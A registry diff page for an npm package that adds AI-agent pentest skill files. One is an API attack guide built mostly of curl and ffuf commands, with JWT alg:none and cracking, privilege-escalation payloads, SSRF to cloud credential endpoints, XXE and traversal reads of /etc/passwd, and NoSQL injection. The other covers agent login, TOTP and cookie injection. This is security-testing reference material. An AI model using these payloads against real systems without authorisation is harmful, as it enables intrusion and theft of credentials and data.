npm - @aegis-scan/skills - Versions diffs - 0.5.0 → 0.5.2 - Mend

@aegis-scan/skills 0.5.0 → 0.5.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (345) hide show

package/skills/offensive/airecon-fork/vulnerabilities-api-testing/SKILL.md ADDED Viewed

@@ -0,0 +1,278 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: api-testing
+description: REST/GraphQL API security testing covering OWASP API Top 10, BOLA, mass assignment, versioning bypass, and auth flaws
+---
+# API Security Testing
+Modern APIs are the primary attack surface. They often lack the hardened defenses of web frontends, expose raw business logic, and are poorly monitored. Focus on authorization, data exposure, and logic before fuzzing.
+## Reconnaissance
+### Discover API Endpoints
+    # Crawl with katana (JS-aware)
+    katana -u https://target.com -d 5 -jc -aff -o output/katana_urls.txt
+    # Find API paths from JS bundles
+    grep -rE '"(/api|/v[0-9]|/graphql|/rest|/gql)' output/katana_urls.txt
+    # Wayback + filtering
+    waybackurls target.com | grep -E '/api|/v[0-9]+' | sort -u
+    # Directory brute-force on common API paths
+    ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,204,301,302,401,403
+    # Parameter discovery
+    arjun -u https://target.com/api/users -oJ output/arjun_params.json
+### Version Discovery
+    # Common versioning patterns to fuzz
+    ffuf -u https://target.com/FUZZ/users -w <(echo -e "v1\nv2\nv3\nv4\napi\napi/v1\napi/v2\napi/v3\nrest\nrest/v1") -mc 200,401,403
+    # Check HTTP headers for version hints
+    curl -sI https://target.com/api/users | grep -iE "version|api-version|x-api"
+### Swagger / OpenAPI Discovery
+    # Common spec paths
+    ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\nopenapi.yaml\napi-docs\napi-docs.json\ndocs\nredoc\nv1/swagger.json\napi/swagger") -mc 200
+    # Convert to request list
+    python3 -c "
+    import json, sys
+    spec = json.load(open('swagger.json'))
+    for path in spec['paths']:
+        print(path)
+    "
+---
+## OWASP API Top 10
+### API1 — Broken Object Level Authorization (BOLA/IDOR)
+The most common and highest impact API vulnerability. Change object IDs in every request.
+    # Numeric ID enumeration
+    ffuf -u https://target.com/api/users/FUZZ/profile -w <(seq 1 10000 | tr '\n' '\n') -H "Authorization: Bearer <token>" -mc 200
+    # UUID enumeration (use known UUIDs as wordlist)
+    # After auth as userA, access userB's resources using their ID
+    # Check all HTTP methods on same endpoint
+    for method in GET POST PUT PATCH DELETE; do
+        curl -s -X $method https://target.com/api/users/1337 -H "Authorization: Bearer <token>" -w "\n%{http_code}\n"
+    done
+    # Test indirect references
+    # /api/orders/my-order → change to /api/orders/<other_order_id>
+    # /api/files/download?name=myfile → change to ../etc/passwd or other user's file
+Detection signals: different response size/content, 200 where 403 expected.
+### API2 — Broken Authentication
+    # Test JWT weaknesses
+    python3 /home/pentester/tools/jwt_tool/jwt_tool.py <token> -T  # tamper modes
+    python3 /home/pentester/tools/jwt_tool/jwt_tool.py <token> -X a  # alg:none
+    python3 /home/pentester/tools/jwt_tool/jwt_tool.py <token> -C -d /usr/share/wordlists/rockyou.txt  # crack
+    # Check if token accepted without signature
+    # Modify payload, set "alg":"none", remove signature
+    # Test API key rotation — if old key still works after rotation:
+    curl -H "X-API-Key: <old_key>" https://target.com/api/profile
+### API3 — Broken Object Property Level Authorization (Mass Assignment)
+    # Test by sending extra fields not shown in docs
+    curl -X PUT https://target.com/api/users/me \
+      -H "Authorization: Bearer <token>" \
+      -H "Content-Type: application/json" \
+      -d '{"name":"test","role":"admin","is_admin":true,"balance":999999,"verified":true}'
+    # Registration endpoint — try to set role/admin flag
+    curl -X POST https://target.com/api/register \
+      -d '{"username":"x","password":"x","email":"x@x.com","role":"admin","is_admin":true}'
+    # Check nested objects
+    curl -X PATCH https://target.com/api/profile \
+      -d '{"profile":{"name":"x"},"subscription":{"plan":"enterprise"}}'
+### API4 — Unrestricted Resource Consumption
+    # Rate limiting test
+    for i in $(seq 1 100); do
+        curl -s -o /dev/null -w "%{http_code}\n" https://target.com/api/login \
+          -X POST -d '{"user":"admin","pass":"test"}' &
+    done
+    # Test large payload handling
+    python3 -c "print('A'*10000000)" | curl -X POST https://target.com/api/upload -d @-
+### API5 — Broken Function Level Authorization (BFLA)
+    # Test admin endpoints as regular user
+    curl -H "Authorization: Bearer <user_token>" https://target.com/api/admin/users
+    curl -H "Authorization: Bearer <user_token>" -X DELETE https://target.com/api/admin/users/1
+    # Method escalation: GET allowed, but POST/PUT/DELETE as user?
+    curl -X PUT https://target.com/api/users/1 \
+      -H "Authorization: Bearer <user_token>" \
+      -d '{"role":"admin"}'
+    # Path case variation
+    curl https://target.com/API/admin/users
+    curl https://target.com/api/Admin/users
+### API6 — Unrestricted Access to Sensitive Business Flows
+    # Test business logic: buy item at lower price
+    # Add discount via mass assignment
+    curl -X POST https://target.com/api/orders \
+      -d '{"item_id":1,"quantity":1,"discount":100,"price":0}'
+    # Negative quantity / negative price
+    curl -X POST https://target.com/api/cart/add \
+      -d '{"product_id":1,"quantity":-100}'
+    # Race condition on one-time-use voucher
+    # Send 50 concurrent requests to use same voucher
+    seq 50 | xargs -P 50 -I{} curl -X POST https://target.com/api/voucher/redeem \
+      -d '{"code":"PROMO50"}' -H "Authorization: Bearer <token>"
+### API7 — Server Side Request Forgery
+    # Find webhook/URL params
+    curl -X POST https://target.com/api/webhooks \
+      -d '{"url":"http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'
+    # Import/export features
+    curl -X POST https://target.com/api/import \
+      -d '{"source":"http://internal-service:8080/admin"}'
+### API8 — Security Misconfiguration
+    # HTTP methods allowed on endpoints
+    curl -X OPTIONS https://target.com/api/ -v
+    # Debug endpoints
+    ffuf -u https://target.com/FUZZ -w <(echo -e "debug\nhealth\nstatus\nmetrics\nenv\nconfig\ninfo\n_debug\n.well-known") -mc 200
+    # CORS misconfiguration
+    curl -H "Origin: https://evil.com" https://target.com/api/user -v | grep -i "access-control"
+### API9 — Improper Inventory Management (Versioning Bypass)
+Old API versions often lack new security controls. Always test older versions.
+    # If v2 enforces auth but v1 doesn't:
+    curl https://target.com/api/v1/users  # no auth
+    curl https://target.com/api/v2/users  # 401
+    # Mobile vs web API differences
+    curl -A "Dalvik/2.1.0 (Linux; U; Android 11)" https://target.com/api/users
+    curl -A "Mozilla/5.0" https://target.com/api/users
+    # Dev/staging endpoints still accessible
+    ffuf -u https://target.com/FUZZ/api/users -w <(echo -e "dev\ntest\nstaging\nbeta\nold\nlegacy\ninternal")
+### API10 — Unsafe Consumption of APIs
+Test third-party integrations the app trusts without validation.
+---
+## Advanced API Attacks
+### HTTP Method Override
+    # Some APIs honor X-HTTP-Method-Override
+    curl -X POST https://target.com/api/users/1 \
+      -H "X-HTTP-Method-Override: DELETE" \
+      -H "Authorization: Bearer <user_token>"
+    curl -X POST https://target.com/api/users/1 \
+      -H "X-Method-Override: PUT" \
+      -d '{"role":"admin"}'
+### Parameter Pollution
+    # Duplicate parameters — backend may take last or first
+    curl "https://target.com/api/users?id=1&id=2"
+    curl -X POST https://target.com/api/users -d "id=1&id=9999"
+    # Array/object injection
+    curl "https://target.com/api/users?id[]=1&id[]=2"
+    curl -X POST https://target.com/api/search -d '{"q":{"$gt":""}}'  # NoSQL injection via JSON
+### Content-Type Switching
+    # Server may parse differently depending on Content-Type
+    curl -X POST https://target.com/api/users \
+      -H "Content-Type: application/xml" \
+      -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data>'
+    # JSON to form-data switch
+    curl -X POST https://target.com/api/users \
+      -H "Content-Type: application/x-www-form-urlencoded" \
+      -d "role=admin&is_admin=1"
+### GraphQL Specific
+    # Introspection
+    curl -X POST https://target.com/graphql \
+      -H "Content-Type: application/json" \
+      -d '{"query":"{ __schema { types { name fields { name } } } }"}'
+    # Disable introspection bypass
+    curl -X POST https://target.com/graphql \
+      -d '{"query":"{ __schema\n{ types { name } } }"}'
+    # Batch query attack (rate limit bypass)
+    curl -X POST https://target.com/graphql \
+      -d '[{"query":"mutation { login(user:\"admin\",pass:\"pass1\") }"},{"query":"mutation { login(user:\"admin\",pass:\"pass2\") }"}]'
+    # Alias enumeration
+    curl -X POST https://target.com/graphql \
+      -d '{"query":"{ a1:user(id:1){email} a2:user(id:2){email} a3:user(id:3){email} }"}'
+    # Field suggestions reveal valid fields
+    curl -X POST https://target.com/graphql \
+      -d '{"query":"{ user { passwordd } }"}'
+    # Error: "Did you mean password?"
+---
+## Automation
+    # nuclei API templates
+    nuclei -u https://target.com -t /home/pentester/nuclei-templates/exposures/apis/ -o output/nuclei_api.txt
+    # Custom ffuf wordlist for API testing
+    ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints-res.txt \
+      -H "Authorization: Bearer <token>" -mc all -fc 404 -o output/api_fuzz.json
+    # arjun for hidden parameters
+    arjun -u https://target.com/api/users -oJ output/params.json --include '{"headers":{"Authorization":"Bearer <token>"}}'
+---
+## Pro Tips
+1. Always compare responses between authenticated user and unauthenticated — diff reveals BOLA
+2. Swagger/OpenAPI specs expose the full attack surface — find them before manual testing
+3. Old API versions (v1 while app uses v3) almost always lack newer security controls
+4. Test every parameter for mass assignment: send extra fields and check if they're reflected in GET
+5. GraphQL introspection reveals the full schema — even if disabled, try field suggestions and aliases
+6. Check mobile apps for hardcoded API keys and alternate endpoints
+7. Race conditions on financial/voucher/limit endpoints are high impact — use parallel requests
+8. Header injection: X-Original-URL, X-Rewrite-URL, X-Forwarded-For can bypass IP-based rate limits
+## Summary
+API security is authorization testing. Every endpoint should be tested with: wrong user's ID, extra fields (mass assignment), all HTTP methods, older API versions, and without authentication. Logic > fuzzing.

package/skills/offensive/airecon-fork/vulnerabilities-auth-workflow/SKILL.md ADDED Viewed

@@ -0,0 +1,252 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+# Authentication Workflow — Complete Tool Reference
+## Quick Reference: Available Auth Actions
+| Action | Purpose | Required params |
+|--------|---------|-----------------|
+| `login_form` | Fill + submit login form | `url`, `username`, `password` |
+| `handle_totp` | Generate + submit TOTP code | `totp_secret` |
+| `save_auth_state` | Capture cookies + localStorage + sessionStorage | — |
+| `inject_cookies` | Restore a saved session | `cookies` (array) |
+| `oauth_authorize` | Complete OAuth/SSO flow | `url` |
+| `check_auth_status` | Verify if currently logged in | — |
+| `wait_for_element` | Wait for a CSS selector to appear | `wait_selector` |
+| `request_user_input` | Ask user for CAPTCHA/TOTP/OTP/password | `prompt`, `input_type` |
+---
+## Decision Tree
+```
+Need to authenticate?
+│
+├─ Have username + password?
+│   └─ Standard site (all fields visible at once)?
+│       ├─ YES → browser_action(action="login_form", url=..., username=..., password=...)
+│       └─ NO (Google/GitHub/Microsoft username-first flow)?
+│           └─ browser_action(action="login_form", ..., multi_step=true)
+│
+│   Check response:
+│   ├─ login_success=true  → save_auth_state → continue testing
+│   ├─ captcha_detected=true
+│   │   → captcha_screenshot already saved (see captcha_screenshot in response)
+│   │   → request_user_input(input_type="captcha", prompt="Solve CAPTCHA in <path>")
+│   │   → type solution → press_key("Enter") → save_auth_state
+│   ├─ mfa_required=true   → see TOTP section below
+│   └─ login_error="..."   → wrong credentials
+│
+├─ MFA / TOTP required?
+│   ├─ Have TOTP secret (base32)?
+│   │   └─ browser_action(action="handle_totp", totp_secret="BASE32SECRET")
+│   │      └─ 8-digit code? → add totp_digits=8
+│   │      └─ 60s period?   → add totp_period=60
+│   │      Check: totp_success=true → save_auth_state
+│   │      If totp_success=false → call handle_totp again (code expired, new 30s window)
+│   │
+│   └─ No secret (user has authenticator app / SMS)?
+│       └─ request_user_input(input_type="totp", prompt="Enter 6-digit code for target.com",
+│                             timeout_seconds=90)
+│          → after user submits: browser_action(action="type", text=<code>)
+│          → browser_action(action="press_key", key="Enter")
+│          → wait_for_element(wait_selector="div.dashboard", wait_timeout=5)
+│          → check_auth_status → save_auth_state
+│
+├─ CAPTCHA blocking?
+│   (Usually auto-detected by login_form — captcha_screenshot auto-taken)
+│   └─ request_user_input(input_type="captcha",
+│                          prompt="Solve CAPTCHA in /workspace/screenshots/screenshot_XYZ.png")
+│      → browser_action(action="type", text=<solution>)
+│      → browser_action(action="press_key", key="Enter")
+│
+├─ Restore a previous session?
+│   └─ browser_action(action="inject_cookies", cookies=[{name, value, domain, path}, ...])
+│      → browser_action(action="goto", url="https://target.com/dashboard")
+│      → check_auth_status to verify
+│
+├─ OAuth / SSO?
+│   └─ browser_action(action="oauth_authorize",
+│                      url="https://github.com/login/oauth/authorize?...",
+│                      callback_prefix="https://target.com/callback")
+│      Check: oauth_token or oauth_callback_url in response
+│
+└─ Verify if authenticated?
+    └─ browser_action(action="check_auth_status")
+       Check: is_authenticated (bool), confidence (0-1), username_display
+```
+---
+## Complete Step-by-Step Examples
+### Example 1: Standard login (single-step)
+```json
+{"action": "login_form", "url": "https://target.com/login",
+ "username": "admin@target.com", "password": "pass123"}
+```
+Response: `{login_success: true, auth_cookies: [...], next_action: "Login succeeded. Call save_auth_state."}`
+```json
+{"action": "save_auth_state"}
+```
+### Example 2: Username-first (Google/GitHub/Microsoft style)
+```json
+{"action": "login_form", "url": "https://accounts.google.com",
+ "username": "user@gmail.com", "password": "pass123", "multi_step": true}
+```
+### Example 3: Login + TOTP (you have the secret)
+```json
+{"action": "login_form", "url": "https://target.com/login",
+ "username": "admin", "password": "pass"}
+```
+Response: `{mfa_required: true, next_action: "MFA/2FA field detected..."}`
+```json
+{"action": "handle_totp", "totp_secret": "JBSWY3DPEHPK3PXP"}
+```
+Response: `{totp_success: true, next_action: "TOTP verified. Call save_auth_state."}`
+```json
+{"action": "save_auth_state"}
+```
+### Example 4: Login + TOTP (user has authenticator app)
+```json
+{"action": "login_form", "url": "https://target.com/login",
+ "username": "admin", "password": "pass"}
+```
+Response: `{mfa_required: true}`
+Call `request_user_input`:
+```json
+{"name": "request_user_input",
+ "prompt": "MFA required for target.com. Enter 6-digit code from your authenticator app.",
+ "input_type": "totp", "timeout_seconds": 90}
+```
+User enters code → value returned:
+```json
+{"action": "type", "text": "123456"}
+```
+```json
+{"action": "press_key", "key": "Enter"}
+```
+```json
+{"action": "wait_for_element", "wait_selector": ".dashboard,.home-page", "wait_timeout": 8}
+```
+```json
+{"action": "check_auth_status"}
+```
+### Example 5: CAPTCHA handling (auto-screenshot)
+```json
+{"action": "login_form", "url": "https://target.com/login",
+ "username": "admin", "password": "pass"}
+```
+Response: `{captcha_detected: true, captcha_type: "recaptcha", captcha_screenshot: "/workspace/screenshots/screenshot_20241201_120000.png"}`
+```json
+{"name": "request_user_input",
+ "prompt": "CAPTCHA detected. Screenshot saved at /workspace/screenshots/screenshot_20241201_120000.png. Type the CAPTCHA text you see.",
+ "input_type": "captcha", "timeout_seconds": 300}
+```
+User solves it → value returned:
+```json
+{"action": "type", "text": "abc123"}
+```
+```json
+{"action": "press_key", "key": "Enter"}
+```
+### Example 6: 8-digit TOTP (enterprise apps)
+```json
+{"action": "handle_totp", "totp_secret": "BASE32SECRET", "totp_digits": 8}
+```
+### Example 7: 60-second TOTP window (non-standard)
+```json
+{"action": "handle_totp", "totp_secret": "BASE32SECRET", "totp_period": 60}
+```
+### Example 8: Session restoration
+```json
+{"action": "inject_cookies",
+ "cookies": [{"name": "session_id", "value": "abc123", "domain": "target.com", "path": "/"}]}
+```
+```json
+{"action": "goto", "url": "https://target.com/dashboard"}
+```
+```json
+{"action": "check_auth_status"}
+```
+---
+## Response Field Reference
+### login_form response
+| Field | Type | Meaning |
+|-------|------|---------|
+| `login_success` | bool | True = authenticated |
+| `captcha_detected` | bool | CAPTCHA is blocking the form |
+| `captcha_type` | str | `recaptcha`, `hcaptcha`, `cloudflare_turnstile`, `unknown` |
+| `captcha_screenshot` | str | **Auto-taken screenshot path** (no need to call screenshot separately) |
+| `mfa_required` | bool | 2FA/TOTP field appeared |
+| `login_error` | str | Error message from page |
+| `url_changed` | bool | Redirect happened after submit |
+| `auth_cookies` | list | Session cookies captured |
+| `next_action` | str | **Always read this** — tells you what to do next |
+### handle_totp response
+| Field | Type | Meaning |
+|-------|------|---------|
+| `totp_success` | bool | Code accepted |
+| `totp_error` | str | Error message if rejected |
+| `totp_code_used` | str | The 6-digit code submitted |
+| `auth_cookies` | list | Session cookies after TOTP |
+| `next_action` | str | What to do next |
+### check_auth_status response
+| Field | Type | Meaning |
+|-------|------|---------|
+| `is_authenticated` | bool | True = logged in |
+| `confidence` | float | 0.0–1.0 confidence score |
+| `score` | int | Raw auth signal score |
+| `has_logout` | bool | Logout link found |
+| `has_profile` | bool | User menu/avatar found |
+| `has_login_form` | bool | Login form still visible |
+| `username_display` | str | Detected username (if any) |
+---
+## Custom Selectors (when defaults fail)
+First inspect the page:
+```json
+{"action": "view_source"}
+```
+Then pass explicit selectors:
+```json
+{
+  "action": "login_form",
+  "url": "https://target.com/login",
+  "username": "admin",
+  "password": "pass",
+  "username_selector": "input#email-address",
+  "password_selector": "input.pwd-field",
+  "submit_selector": "button.login-btn"
+}
+```
+---
+## Common Mistakes
+1. **CAPTCHA screenshot is auto-taken** — `captcha_screenshot` field has the path. Do NOT call `screenshot` again separately before `request_user_input`.
+2. **TOTP expires every 30 seconds** — if `totp_success=false`, call `handle_totp` again immediately (new code generated automatically).
+3. **Multi-step vs single-step** — if username fills but password field never appears, try `multi_step=true`. Google/Microsoft/GitHub all use username-first flows.
+4. **Always `save_auth_state` after success** — cookies alone aren't enough; `localStorage`/`sessionStorage` may hold auth tokens (JWT, access tokens).
+5. **`check_auth_status` after every login** — don't assume success from URL alone. Some apps redirect to login page with error message (same URL, different content).